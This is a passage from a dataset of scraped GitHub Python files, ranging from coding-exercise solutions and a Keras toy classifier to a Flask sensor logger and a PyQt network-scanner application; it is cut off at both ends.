= plt.axes(projection='3d')\n\nxdata = np_loc_list[:,0]\nydata = np_loc_list[:,1]\nzdata = np_loc_list[:,2]\n\nprint(xdata)\n\n# ax.set_box_aspect((np.ptp(xdata), np.ptp(ydata), np.ptp(zdata)))\n\nax.scatter3D(zdata, ydata,xdata, c=xdata, cmap='tab10')\n\nplt.savefig('output.png')\n","repo_name":"Walla-B/DTMS","sub_path":"parse_data.py","file_name":"parse_data.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"17312894784","text":"from collections import re\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n # if len(s)<1 or len(s)>2*10**5 or not s.isascii():\n # return \n# TO:DO check if i is printable. i.isprintable()\n# remove non alphanumeric characters\n newStr= re.sub(r'[^a-zA-Z0-9]','',s).lower()\n # two pointers, one starts at the end the other one starts at the begining\n start,end=0,len(newStr)-1\n while start<=end:\n if newStr[start] != newStr[end]:\n return False\n start+=1\n end-=1\n return True","repo_name":"leonkoech/DataStructures-Algos","sub_path":"Data Structures/arrays/isPalindrome.py","file_name":"isPalindrome.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25103737188","text":"import pandas as pd\nimport numpy as np\nimport datetime as dt\nimport csv\n\n\ndef data_strip(df, league, rounds, date_current):\n \n if league == 0: \n df = df[df['league'] == 'Barclays Premier League']\n elif league == 1:\n df = df[df['league'] == 'Danish SAS-Ligaen']\n\n\n # Convert date into datetime\n old_dates = df['date'].unique()\n\n for od in old_dates:\n text = od.split('-')\n date = dt.datetime(int(text[0]), int(text[1]), int(text[2]))\n df = df.replace(od, date)\n\n # Remove previous rounds\n df = df[df['date'] > date_current]\n \n return df\n\n\n\ndef get_data(df, teams, rounds, decimals):\n header = [\"Round\", \"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\"]\n db = []\n\n print(\"%4s\" % \"Team\", end =\" \")\n for i in range(rounds):\n print(\"%-4d\" % (i+1), end =\" \")\n print(\"%-4s\" % \"avg\") \n \n with open('./data.csv', 'w', encoding='UTF8', newline='') as f:\n \n writer = csv.writer(f)\n writer.writerow(header)\n\n for team in teams:\n odds = [team.arc]\n opps = []\n data = [team.arc]\n \n df2 = df\n df2 = df2[(df2['team1'] == team.name) | (df['team2'] == team.name)]\n \n # Relevant games after start-date\n df2 = df2[0:rounds]\n \n for i in range(rounds): \n if df2.iloc[i]['team1'] == team.name:\n odds.append(df2.iloc[i]['prob1'])\n data.append(str(df2.iloc[i]['prob1']).replace('.',','))\n opps.append(df2.iloc[i]['team2'])\n else:\n odds.append(df2.iloc[i]['prob2'])\n data.append(str(df2.iloc[i]['prob2']).replace('.',','))\n opps.append(df2.iloc[i]['team1'])\n \n writer.writerow(data)\n odds.append( round(np.mean(odds[1:]) * decimals) / decimals )\n \n db.append(odds)\n \n f.close()\n \n return db\n\n\n\ndef print_data(db, rounds):\n db.sort(key=lambda row: (row[-1]), reverse=True)\n\n for item in db:\n print(\"%-4s\" % item[0], end =\" \")\n for i in range(rounds):\n print(\"%-0.2f\" % item[i+1], end =\" \")\n print(\"%-0.2f\" % item[-1]) \n","repo_name":"MHVandborg/BotHoldet","sub_path":"files/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} 
+{"seq_id":"2221316905","text":"from django.urls import path\n\nfrom .views import CustomerDetailView, CustomerListView,ProductListView,ProductDetailView,OrderDetailView,OrderListView,AddToCartView\n\n\n\nurlpatterns =[\n path (\"Customer/\",CustomerListView.as_view(), name = \"customer_list_view\"),\n path(\"Customer//\",CustomerDetailView.as_view(), name = \"customer_detail_view\"),\n path(\"Product/\",ProductListView.as_view(),name = \"product_list_view\"),\n path(\"Product//\",ProductDetailView.as_view(), name = \"product_detail_view\"),\n path(\"Order/\",OrderListView.as_view(),name=\"order_list_view\"),\n path(\"Order//\",OrderDetailView.as_view(),name=\"order_detail.view\"),\n path(\"add_to_cart\",AddToCartView.as_view(),name = \"add_to_cart\")\n]","repo_name":"MariaGKimani/Green_kiosk","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72964898032","text":"import numpy as np\nimport keras\nfrom keras.models import Sequential #= linear stack of layers\nfrom keras.layers import Dense #every node from one layer connected to every node in next layer\nfrom keras.optimizers import Adam # adaptive optimization algorithm \n#stochastic gradient descent\n#computes adaptive learning rates\n#srecommended algorithm to be used\nimport matplotlib.pyplot as plt\n\nn_pts = 500\nnp.random.seed(0)\nXa = np.array([np.random.normal(13, 2, n_pts),\n np.random.normal(12, 2, n_pts)]).T\nXb = np.array([np.random.normal(8, 2, n_pts),\n np.random.normal(6, 2, n_pts)]).T\n \nX = np.vstack((Xa, Xb))\ny = np.matrix(np.append(np.zeros(n_pts), np.ones(n_pts))).T\n \nplt.scatter(X[:n_pts,0], X[:n_pts,1])\nplt.scatter(X[n_pts:,0], X[n_pts:,1])\n\nmodel = Sequential()\nmodel.add(Dense(units=1,input_shape = (2,),activation = 'sigmoid')) #add layers to NN\n#only 2 inputs (x1,x2)\nadam = Adam(lr = 0.1) #minimize error to 0.1\n#configure learnung process\nmodel.compile(adam, loss='binary_crossentropy', metrics = ['accuracy'])\n#pass in training data, pass in labels assigned to data points :\nhist = model.fit(x=X,y=y,verbose=1,batch_size=50,epochs = 10, shuffle = 'true') \n#0 top region, 1 bottom region\n# it's important to pass in labels to know if we classified correctly\n#batch_size* iterations to get to number of points = n_pts\n#amount of epochs is important to avoid overfitting or underfitting\n#shuffle makes sure to not get stuck in local minimum by shuffling subsets\n\nplt.plot(hist.history['acc'],label = 'accuracy')\nplt.plot(hist.history['loss'],label = 'loss')\nplt.title('accuracy and loss ')\nplt.xlabel('Epoch')\nplt.legend(loc = 'upper right')\n","repo_name":"Cedric-Perauer/Code-Dump","sub_path":"Python/Useful/Classifier/Classifier_Short_Version.py","file_name":"Classifier_Short_Version.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73082211630","text":"class Solution:\n def shifted_binary_search(self, pivot: int, target: int, nums: List[int]) -> int:\n shift = self.n - pivot\n left, right = (pivot + shift) % self.n, (pivot - 1 + shift) % self.n\n \n while left <= right:\n mid = left + ((right - left) >> 1)\n if nums[(mid - shift) % self.n] == target:\n return (mid - shift) % self.n\n elif nums[(mid - shift) % self.n] > target:\n right = mid - 1\n else:\n left = mid + 1\n \n return -1\n \n def search(self, nums: List[int], target: int) -> int:\n self.n = 
len(nums)\n left, right = 0, self.n - 1\n \n while left <= right:\n mid = left + ((right - left) >> 1)\n if nums[mid] > nums[-1]:\n left = mid + 1\n else:\n right = mid - 1\n \n return self.shifted_binary_search(left, target, nums)","repo_name":"AndanteKim/LeetCode_Practice","sub_path":"0033-search-in-rotated-sorted-array/0033-search-in-rotated-sorted-array.py","file_name":"0033-search-in-rotated-sorted-array.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"18383953101","text":"import itertools\nx = \"\"\nn = int(input())\ncct = \"A\"\ncircuitA = []\ncircuitB = []\nwhile x != \"poB\":\n circuit = list(map(str, input().strip().split()))\n if(circuit[0] == \"CircuitA\"):\n cct = \"A\"\n continue\n elif(circuit[0] == \"CircuitB\"):\n cct = \"B\"\n continue\n \n if(cct == \"A\"):\n circuitA.append(circuit)\n elif(cct == \"B\"):\n circuitB.append(circuit)\n\n x = circuit[0]\n\n \n\ndef evaluateOneCct(cct,INPUT,logicDict):\n \n # print(cct,INPUT)\n\n for i in range(len(cct)):\n if(len(cct[i]) > 1):\n if(str(cct[i])[:2] == \"pi\"):\n # cct[i] = INPUT[int(cct[i][2:].strip())]\n cct[i] = \"True\"\n if(str(cct[i])[:3] == \"~pi\"):\n \n # cct[i] = \"not \" + INPUT[int(cct[i][3:].strip())]\n cct[i] = \"True\"\n # print(cct[i])\n \n \n return cct[0], True\n\n\n operation = cct[1]\n if(operation not in [\"and\",\"or\",\"xor\",\"nand\",\"nor\",\"xnor\", \"not\", \"buf\"]):\n return cct[0], True\n\n if(operation == \"xnor\"):\n operation = \"xor\"\n exp = \"not \" + (\" \" + operation + \" \").join(list(map(str,cct[2:])))\n elif(operation == \"nand\"):\n operation = \"and\"\n exp = \"not \" + (\" \" + operation + \" \").join(list(map(str,cct[2:])))\n elif(operation == \"nor\"):\n operation = \"or\"\n exp = \"not \" + (\" \" + operation + \" \").join(list(map(str,cct[2:])))\n\n else:\n exp = (\" \" + operation + \" \").join(list(map(str,cct[2:])))\n\n \n\n exp = exp.replace('xor', '^').replace('~', 'not ')\n for key in logicDict:\n exp = exp.replace(key, str(logicDict[key]))\n\n if(operation == \"not\"):\n exp = \"not \" + exp\n solution = eval(exp)\n # print(exp, \" = \",solution)\n return cct[0], solution\n\ndef evaluateCct(circuit,INPUT):\n logicDict = {}\n for cct in circuit:\n # print(cct)\n out, solution = evaluateOneCct(cct[:],INPUT,logicDict)\n logicDict[out] = solution\n # print(logicDict)\n return logicDict\n\n\n# print(evaluateCct(circuitA,INPUT))\n\nINPUTS = list(itertools.product([\"True\", \"False\"], repeat=n))\n\nrslt = []\nfor INPUT in INPUTS:\n\n outA = evaluateCct(circuitA,INPUT) \n outB = evaluateCct(circuitB,INPUT)\n # print(INPUT, outA[\"poA\"],outB[\"poB\"])\n rslt.append(outA[\"poA\"] == outB[\"poB\"])\n \n\n# print(rslt)\nif(rslt.count(True) == len(rslt)):\n print(\"Identical\")\nelif(rslt.count(False) == len(rslt)):\n print(\"Inverse\")\nelse:\n print(\"None\")\n\n# INPUT = [\"False\", \"False\", \"False\", \"False\"]\n# outB = evaluateCct(circuitB,INPUT)","repo_name":"chamikagangul/Data-Structures-and-Algorithms","sub_path":"test/cpp workshop/Two Circuits.py","file_name":"Two Circuits.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71127340912","text":"'''\nYou are given a sorted list of distinct integers from 0 to 99,\nfor instance [0, 1, 2, 4, 50, 52, 75].\nYour task is to produce a string that describes numbers missing from the list;\nin this case 
\"3,5-49,51,53-74,76-99\". The items should be sorted in ascending order\nand separated by commas when a gap spans only one number. When a gap is longer,\nthe item comprises the start and the end of the gap, joined with a minus sign.\n'''\nfrom typing import List\n\nclass Solution:\n def listMissingIntegers(self, nums: List[int]) -> str:\n res = \"\"\n i = 1\n # the beginning\n if nums[0] != 0:\n res = res + str(0) + \",\"\n\n while i < len(nums):\n if nums[i] - nums[i - 1] == 2:\n res = res + str((nums[i - 1] + 1)) + \",\"\n elif nums[i] - nums[i - 1] > 2:\n res = res + str((nums[i - 1] + 1)) + \"-\" + str((nums[i] - 1)) + \",\"\n i += 1\n\n # the ending\n if nums[i - 1] != 99:\n if 99 - nums[i - 1] == 2:\n res = res + str((nums[i - 1] + 1)) + \",\"\n elif 99 - nums[i - 1] > 2:\n res = res + str((nums[i - 1] + 1)) + \"-\"\n res = res + str(99)\n else:\n res = res[:-1]\n\n return res\n\ns = Solution()\nnums = [1, 2, 4, 50, 52, 75, 97, 98, 99]\nprint(s.listMissingIntegers(nums))","repo_name":"geotransformer/python3","sub_path":"pythoncode/Classic/MissingIntegerSortedArrayList.py","file_name":"MissingIntegerSortedArrayList.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"19817911399","text":"import time\nfrom datetime import date, datetime, timedelta\nfrom flask import Flask, render_template, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import and_\nfrom sqlalchemy.sql import select\nfrom sqlalchemy.orm import contains_eager\nfrom itertools import tee\n\napp = Flask(__name__,template_folder=\"./dist/templates\",static_folder=\"./dist/static\")\n\napp.config.from_object('config.default')\napp.url_map.strict_slashes = False\napp.url_map.strict_slashes = False\n\ndb = SQLAlchemy(app)\n\nfrom models import Sensor, SensorData\n\n@app.route(\"/\", defaults={'timerange': 24})\n@app.route(\"/\")\ndef index(timerange):\n upper = datetime.now()\n then = datetime(2000, 1, 1)\n if timerange > 0:\n then = upper - timedelta(hours=timerange)\n sensors = Sensor.query.join(Sensor.data).options(contains_eager(Sensor.data)).filter(SensorData.date.between(time.mktime(then.timetuple()), time.mktime(upper.timetuple()))).all()\n return render_template('index.html', sensors=sensors)\n\n@app.route(\"/data//////\", methods=['GET', 'POST'])\ndef data(temp, hum, pres, pm2_5, pm10, pwd):\n if pwd == app.config['PASS']:\n now = datetime.now()\n sensor_names = ['temp', 'hum', 'pres', 'PM 2.5', 'PM 10']\n sensor_units = ['°C', '%', 'hPa', 'μg /m³', 'μg /m³']\n values = [temp, hum, pres, pm2_5, pm10]\n\n for (sensor_name, unit, value) in zip(sensor_names, sensor_units, values):\n sensor = Sensor.query.filter_by(name = sensor_name).first()\n if sensor is None:\n sensor = Sensor(name = sensor_name, unit = unit)\n db.session.add(sensor)\n db.session.commit()\n\n data = SensorData(date = time.mktime(now.timetuple()), value = value)\n sensor.data.append(data)\n db.session.add(data)\n db.session.commit()\n return redirect(\"/\", code=303)\n\n@app.before_first_request\ndef create_tables():\n db.create_all()\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","repo_name":"krzyz/sensor-data","sub_path":"sensor_data.py","file_name":"sensor_data.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18117315075","text":"import requests\nimport pandas as pd\n\ndef gen_url(attribute):\n\n df = 
pd.read_csv('amazon_scrapy/amazon_scrapy/spiders/crawl_results.csv')\n subdf = df[df['query'].str.contains(attribute)]\n urllist = []\n for index, row in subdf.iterrows():\n base_url = \"https://www.amazon.com/\"\n static = 'dp/'\n asin = row.asin\n url = base_url + static + asin\n html = requests.get(url)\n if html.status_code != 404:\n #print(url, end=' ')\n urllist.append(url)\n #print(\"\")\n #print(urllist)\n return urllist\n","repo_name":"arontaupe/ruminations","sub_path":"url_generator.py","file_name":"url_generator.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22122181699","text":"#!/usr/bin/python3\n# This Python file uses the following encoding: utf-8\n\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QPushButton, QComboBox, QDialog, QFileDialog, QMessageBox, QCompleter, QProgressDialog, QProgressBar\nfrom PyQt5 import uic\nfrom PyQt5.QtCore import QProcess, QSettings, QThreadPool, pyqtSignal, pyqtSlot, Qt\nfrom PyQt5.QtGui import QPixmap, QImage\n\nimport sys\nimport time\nimport sane\nfrom urllib.request import urlopen\nimport bs4\nimport glob\nimport os, io\nfrom PIL import ImageEnhance\nimport ocrtools as ocrt\nimport tempfile\n\n\nfrom ui_dialog import Ui_Dialog\nfrom multithread import Worker, WorkerSignals\nfrom imagecalibrate import ConfigWindow\n\n#from ui_mainwindow import Ui_MainWindow\nimport resources\n\n\n\ntry:\n os.chdir(sys._MEIPASS)\n print(sys._MEIPASS)\nexcept:\n pass\n\nXML_PATH = '/hp/device/notifications.xml'\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n \n self.mode = ['lineart','gray','color']\n self.resolution = ['75','100','150','200','300','600','1200']\n self.compression = ['None','JPEG']\n self.scanFolder = os.getcwd()\n self.ver = sane.init()\n \n self.ui = uic.loadUi(\"mainwindow.ui\", self)\n #self.ui = Ui_MainWindow()\n #self.ui.setupUi(self)\n \n self.dialog = QDialog()\n self.message = QMessageBox()\n \n self.threadpool = QThreadPool()\n\n self.settings = QSettings(\"bibuweb.de\",\"Scan2Folder\")\n\n self.progressBar = None\n\n #self.configWin = ConfigWindow(self)\n #self.configWin.ui.scanButton.clicked.connect(self.configScan)\n \n\n \n self.ui.resolutions.addItems(self.resolution)\n self.ui.resolutions.setCurrentIndex(self.ui.resolutions.findText('300'))\n\n self.ui.btnOpenDir.clicked.connect(self.openDir)\n self.ui.btnStartscan.clicked.connect(self.startScanJob)\n self.ui.btnOcr.clicked.connect(self.ocr2pdf)\n ## for testing enable button\n self.ui.btnOcr.setEnabled(True)\n\n self.ui.actionCalibrate.triggered.connect(self.configureWindow)\n #self.configWin.ui.saveButton.clicked.connect(self.saveConfig)\n\n\n # Change Color back after error\n self.ui.filename.cursorPositionChanged.connect(self.leditcolor)\n\n self.ui.scanpath.cursorPositionChanged.connect(self.leditcolor)\n self.ui.scanpath.textChanged.connect(self.scanPathCanged)\n\n self.is_dev = True\n self.dev_available = False\n self.dev_connected = False\n self.adf = False\n self.dev = None\n self.devices = []\n self.scanStatus = False\n self.btnStyle = \"\"\n\n self.contrast = 1\n self.brightness = 1\n self.color = 1\n self.sharpness = 1\n self.gamma = 1\n self.scanPath = \"\"\n self.ocr = False\n self.crop = False\n self.cropSize = {'left':1,'top':1,'width':1,'height':1}\n self.ocrFiles = []\n self.tempocr = None\n self.configWin = None\n self.defaultGroup = self.settings.value(\"defaultGroup\")\n\n 
self.getSettings(self.defaultGroup)\n #if len(self.scanPath) > 1:\n # self.createCompleter()\n\n self.ui.cmbBoxOcr.addItem(\"default\")\n self.ui.cmbBoxOcr.addItems(self.settings.childGroups())\n\n\n if self.defaultGroup == \"\":\n self.ui.cmbBoxOcr.setCurrentText(\"default\")\n else:\n self.ui.cmbBoxOcr.setCurrentText(self.defaultGroup)\n\n self.ui.cmbBoxOcr.currentIndexChanged.connect(self.profileChanged)\n\n def getSettings(self, group):\n print(self.settings.childGroups())\n self.settings.beginGroup(group)\n print(self.settings.group())\n\n\n if self.settings.contains(\"ocr\"):\n if self.settings.value('ocr') == 'true':\n self.ocr = True\n self.ui.actionEnable_OCR.setChecked(True)\n else:\n self.ui.actionEnable_OCR.setChecked(False)\n ## connect Signal here and not before loading settings\n ## if not, you never will get the stored value because QAction is triggered when ever the value changed\n\n if self.settings.contains('crop'):\n if self.settings.value('crop') == 'true':\n self.crop = True\n\n if self.settings.contains('cropSize'):\n #print(self.settings.value('cropSize'))\n self.cropSize = self.settings.value('cropSize')\n\n\n if self.settings.contains(\"path\"):\n self.ui.scanpath.setText(self.settings.value(\"path\"))\n self.scanPath = self.settings.value(\"path\")\n self.createCompleter()\n \n if self.settings.contains('contrast'):\n self.brightness = self.settings.value('brightness')\n \n self.contrast = self.settings.value('contrast')\n\n if self.settings.contains('color'):\n self.color = self.settings.value('color')\n\n if self.settings.contains(\"sharpness\"):\n self.sharpness = self.settings.value('sharpness')\n\n if self.settings.contains(\"gamma\"):\n self.gamma = self.settings.value('gamma')\n\n self.settings.endGroup()\n\n def setConfigWinSettings(self):\n\n self.configWin.ui.profileSelect.clear()\n self.configWin.ui.profileSelect.addItem(\"default\")\n self.configWin.ui.profileSelect.addItems(self.settings.childGroups())\n\n\n\n if self.defaultGroup == \"\":\n self.configWin.ui.profileSelect.setCurrentText(\"default\")\n else:\n self.configWin.ui.profileSelect.setCurrentText(self.defaultGroup)\n\n if self.settings.contains(\"ocr\"):\n if self.settings.value('ocr') == 'true':\n self.configWin.ui.OCR_Enabled.setChecked(True)\n self.configWin.ui.OCR_Box.setEnabled(True)\n\n else:\n self.configWin.ui.OCR_Enabled.setChecked(False)\n self.configWin.ui.OCR_Box.setEnabled(False)\n ## connect Signal here and not before loading settings\n ## if not, you never will get the stored value because QAction is triggered when ever the value changed\n self.configWin.ui.OCR_Enabled.stateChanged.connect(self.ocrConfig)\n\n if self.settings.contains('crop'):\n self.configWin.ui.checkCrop.setChecked(self.crop)\n\n if self.settings.contains('cropSize'):\n self.configWin.ui.cropX.setValue(self.cropSize['left'])\n self.configWin.ui.cropY.setValue(self.cropSize['top'])\n self.configWin.ui.cropW.setValue(self.cropSize['width'])\n self.configWin.ui.cropH.setValue(self.cropSize['height'])\n\n if self.settings.contains('contrast'):\n self.configWin.ui.brigthnessLcd.setValue(float(self.brightness))\n self.configWin.ui.brigthnesSlider.setValue(int(float(self.brightness)*10))\n self.configWin.ui.contrastLcd.setValue(float(self.contrast))\n self.configWin.ui.contrastSlider.setValue(int(float(self.contrast)*10))\n\n if self.settings.contains('color'):\n self.configWin.ui.colorLcd.setValue(float(self.color))\n self.configWin.ui.colorSlider.setValue(int(float(self.color)*10))\n\n if 
self.settings.contains(\"sharpness\"):\n self.configWin.ui.sharpnessLcd.setValue(float(self.sharpness))\n self.configWin.ui.sharpnessSlider.setValue(int(float(self.sharpness)*10))\n\n if self.settings.contains(\"gamma\"):\n self.configWin.ui.gammaLcd.setValue(float(self.gamma))\n self.configWin.ui.gammaSlider.setValue(int(float(self.gamma)*10))\n\n def configureWindow(self):\n\n self.configWin = ConfigWindow(self)\n\n self.configWin.ui.scanButton.clicked.connect(self.configScan)\n self.configWin.ui.saveButton.clicked.connect(self.saveConfig)\n self.setConfigWinSettings()\n ## Connect the Combox after setConfigWinSettings\n ## if not you ran into an RecursionError!!\n self.configWin.ui.profileSelect.currentIndexChanged.connect(self.configWinUpdate)\n\n if self.dev is not None:\n self.configWin.ui.scanButton.setEnabled(True)\n self.configWin.ui.scanButton.setText(\"Start Scan\")\n else:\n self.configWin.ui.scanButton.setEnabled(False)\n self.configWin.ui.scanButton.setText(\"Sart Scan Service first\")\n\n self.configWin.show()\n\n @pyqtSlot(int)\n def configWinUpdate(self,pos):\n group = self.configWin.ui.profileSelect.currentText()\n idx = self.configWin.ui.profileSelect.currentIndex()\n\n if group == \"default\":\n group = \"\"\n\n ## Disconnect the Combox before you add new values\n ## if not you ran into an RecursionError!!\n self.configWin.ui.profileSelect.currentIndexChanged.disconnect()\n\n self.getSettings(group)\n self.setConfigWinSettings()\n self.configWin.ui.profileSelect.setCurrentIndex(idx)\n ## Connect the Combox after setConfigWinSettings\n ## if not you ran into an RecursionError!!\n self.configWin.ui.profileSelect.currentIndexChanged.connect(self.configWinUpdate)\n pass\n\n def closeEvent(self, event):\n #if not set, process keeps running in background\n self.scanStatus = False\n\n\n def openDir(self):\n fileDlg = QFileDialog()\n self.scanFolder = fileDlg.getExistingDirectory(self,'Scan Folder',self.scanFolder, QFileDialog.DontUseNativeDialog)\n self.ui.scanpath.setText(self.scanFolder)\n self.settings.beginGroup(self.defaultGroup)\n self.settings.setValue(\"path\",self.scanFolder)\n self.settings.sync()\n self.settings.endGroup()\n \n\n\n def startThread(self, fn, resultFn=None, complete=None):\n worker = Worker(fn) # Any other args, kwargs are passed to the run function\n if resultFn is not None:\n worker.signals.result.connect(resultFn)\n if complete is not None:\n worker.signals.finished.connect(complete)\n #worker.signals.progress.connect(self.scannerProgress)\n self.threadpool.start(worker)\n \n\n \n def thread_complete(self):\n self.scannerProgress(100)\n time.sleep(1)\n self.dialog.close()\n \n if self.dev_available:\n self.show()\n else:\n #TODO: put error dlg here\n self.message.setText(\"No scanner found\\n Check your Configuration!\")\n self.message.exec()\n print(\"Error: No Devices found\")\n \n \n print(\"THREAD COMPLETE! 
\", self.threadpool.activeThreadCount())\n\n\n @pyqtSlot(str)\n def scanPathCanged(self,path):\n self.scanPath = path\n self.createCompleter()\n\n def createCompleter(self):\n\n ff = glob.glob(self.scanPath+\"/*.pdf\")\n files = []\n for f in ff:\n files.append(os.path.basename(f).split('.')[0])\n completer = QCompleter(files)\n completer.setCaseSensitivity(Qt.CaseInsensitive)\n self.ui.filename.setCompleter(completer)\n\n\n def scannerLookup(self):\n\n #self.dialog.setModal(True)\n\n self.uidlg = Ui_Dialog()\n self.uidlg.setupUi(self.dialog)\n \n self.dialog.show()\n \n def checkScanMode(self):\n mode = \"\"\n if self.ui.btnBuW.isChecked():\n mode = self.ui.btnBuW.text()\n elif self.ui.btnGray.isChecked():\n mode = self.ui.btnGray.text()\n elif self.ui.btnColor.isChecked():\n mode = self.ui.btnColor.text()\n print(mode)\n return mode\n \n \n \n def scannerAddToDlg(self,result):\n self.devices = result\n if len(self.devices) > 0:\n self.dev_available = True\n for i, dev in enumerate(result):\n self.ui.comboBox.addItem(dev[i])\n else:\n return\n\n\n def scannerProgress(self,val):\n self.uidlg.progressBar.setValue(val)\n \n \n def scanners(self):\n self.scannerLookup()\n self.startThread(sane.get_devices,self.scannerAddToDlg, self.thread_complete)\n\n def scannerCheck(self):\n self.statusBar().showMessage(\"looking up for scanner ....\")\n print(self.devices[0])\n count = 0\n while self.is_dev:\n\n try:\n #ToDo: check index from\n \n self.dev = sane.open(self.devices[0][0])\n \n \n except:\n print(\"no scanner connected, waiting...\",self.dev)\n if self.dev is not None:\n self.is_dev = False\n self.dev_connected = True\n print(\"scanner connected\")\n time.sleep(3)\n ## Stop process after 3 times to avoid endless loop if no device is available\n ## due started as thread\n count += 1\n if count > 2:\n self.is_dev = False\n\n self.statusBar().showMessage(\"No Scanner connected!\")\n \n def commonThreadEnd(self):\n print(\"Thread ended\")\n \n def scanDocThreadEnded(self):\n self.statusBar().showMessage(\"Job stopped\")\n self.scanStatus = False\n self.setLedStatus()\n \n def scannerCheckThreadEnd(self):\n print(\"Lookup Thread ended\")\n\n if self.dev_connected:\n self.startThread(self.scanDocuments,None,self.scanDocThreadEnded)\n else:\n msg = QMessageBox()\n msg.setText(\"No Scanner Connected\")\n msg.setIcon(QMessageBox.Warning)\n msg.exec()\n\n def setScannerStatus(self):\n if self.dev_connected:\n self.setLedStatus()\n self.statusBar().showMessage(\"Scanner connected\",10)\n self.setScanButton(\"running\")\n else:\n self.setScanButton('stopped')\n\n \n def setLedStatus(self):\n if self.scanStatus:\n pix = QPixmap(\":/images/square_green.svg\")\n else:\n pix = QPixmap(\":/images/square_red.svg\")\n\n self.ui.statusLed.setPixmap(pix)\n\n\n def scanDocuments(self):\n ip = self.devices[0][0].split('=')[1]\n print(ip)\n url = 'http://' + ip + XML_PATH\n self.dev.mode = self.checkScanMode()\n self.dev.resolution = int(self.ui.resolutions.currentText())\n imgNr = 0\n savePath = self.ui.scanpath.text()+\"/\"\n imgPrefix = self.ui.filename.text()+\"_\"\n #self.dev.contrast = 900\n #self.dev.brightness = self.brightness\n while self.scanStatus:\n btnreq = urlopen(url)\n soup = bs4.BeautifulSoup(str(btnreq.read()),'lxml')\n if soup.startscan.string == str(1):\n #print(\"Pressed\")\n if soup.adfloaded.string == str(1):\n self.adf=True\n print(\"ADF Source\")\n self.dev.source = 'ADF'\n imIter = self.dev.multi_scan()\n \n while self.adf:\n try: \n im = imIter.next()\n imgNr = imgNr+1\n img = 
imgPrefix+str(imgNr)+\".png\"\n im.save(savePath+img)\n if self.ocr:\n self.ocrFiles.append(savePath+img)\n except:\n self.adf=False\n break\n else:\n self.adf=False\n imgNr = imgNr+1\n img = imgPrefix+str(imgNr)+\".png\"\n self.dev.start()\n im = self.dev.snap()\n self.enhanceImage(im,savePath,img)\n if self.ocr:\n self.ocrFiles.append(savePath+img)\n time.sleep(3)\n\n def enhanceImage(self,image,path,pf):\n brightness = ImageEnhance.Brightness(image)\n image = brightness.enhance(float(self.brightness))\n contrast = ImageEnhance.Contrast(image)\n image = contrast.enhance(float(self.contrast))\n if self.dev.mode == \"color\":\n colour = ImageEnhance.Color(image)\n image = colour.enhance(float(self.color))\n sharpness = ImageEnhance.Sharpness(image)\n image = sharpness.enhance(float(self.sharpness))\n\n print(\"Gamma: \", self.gamma)\n gamma = float(self.gamma)\n image = image.point(self.gamma_table( gamma, gamma, gamma))\n\n print(\"image saved \",self.ui.scanpath.text()+\"/\"+pf)\n image.save(path+pf)\n\n @pyqtSlot()\n def profileChanged(self):\n group = self.ui.cmbBoxOcr.currentText()\n self.getSettings(group)\n\n @pyqtSlot()\n def leditcolor(self):\n self.ui.scanpath.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.ui.filename.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n\n def startScanJob(self):\n \n # print(\"Path: \",self.scanpath.text())\n # print(\"Mode: \",mode)\n # print(\"Resolution: \", self.resolutions.currentText())\n # print(\"File: \", self.filename.text())\n\n if len(self.ui.scanpath.text()) == 0:\n msg = QMessageBox()\n msg.setText(\"Please enter file path!\")\n msg.exec()\n self.ui.scanpath.setStyleSheet(\"background-color:rgb(255, 170, 127)\")\n return\n \n if len(self.ui.filename.text()) == 0:\n msg = QMessageBox()\n msg.setText(\"Please enter file name prefix!\")\n msg.exec()\n self.ui.filename.setStyleSheet(\"background-color:rgb(255, 170, 127)\")\n return\n\n\n\n if not self.scanStatus:\n self.setScanButton(\"starting\")\n self.startThread(self.scannerCheck,self.setScannerStatus, self.scannerCheckThreadEnd)\n self.scanStatus = True\n self.ui.scanpath.setEnabled(False)\n self.ui.filename.setEnabled(False)\n else:\n self.scanStatus = False\n self.setScanButton(\"stopped\")\n self.ui.scanpath.setEnabled(True)\n self.ui.filename.setEnabled(True)\n self.ui.filename.clear()\n\n if self.ocr and len(self.ocrFiles) > 0:\n #self.ui.btnOcr.setEnabled(True)\n self.ocr_StrartDlg()\n # self.tempocr = tempfile.NamedTemporaryFile(delete=False)\n # for f in self.ocrFiles:\n # self.tempocr.write(str(f+\"\\n\").encode())\n # self.tempocr.close()\n \n def setScanButton(self,status):\n\n if status == \"starting\":\n self.btnStyle = self.ui.btnStartscan.styleSheet()\n \n self.ui.btnStartscan.setStyleSheet(\"background-color: 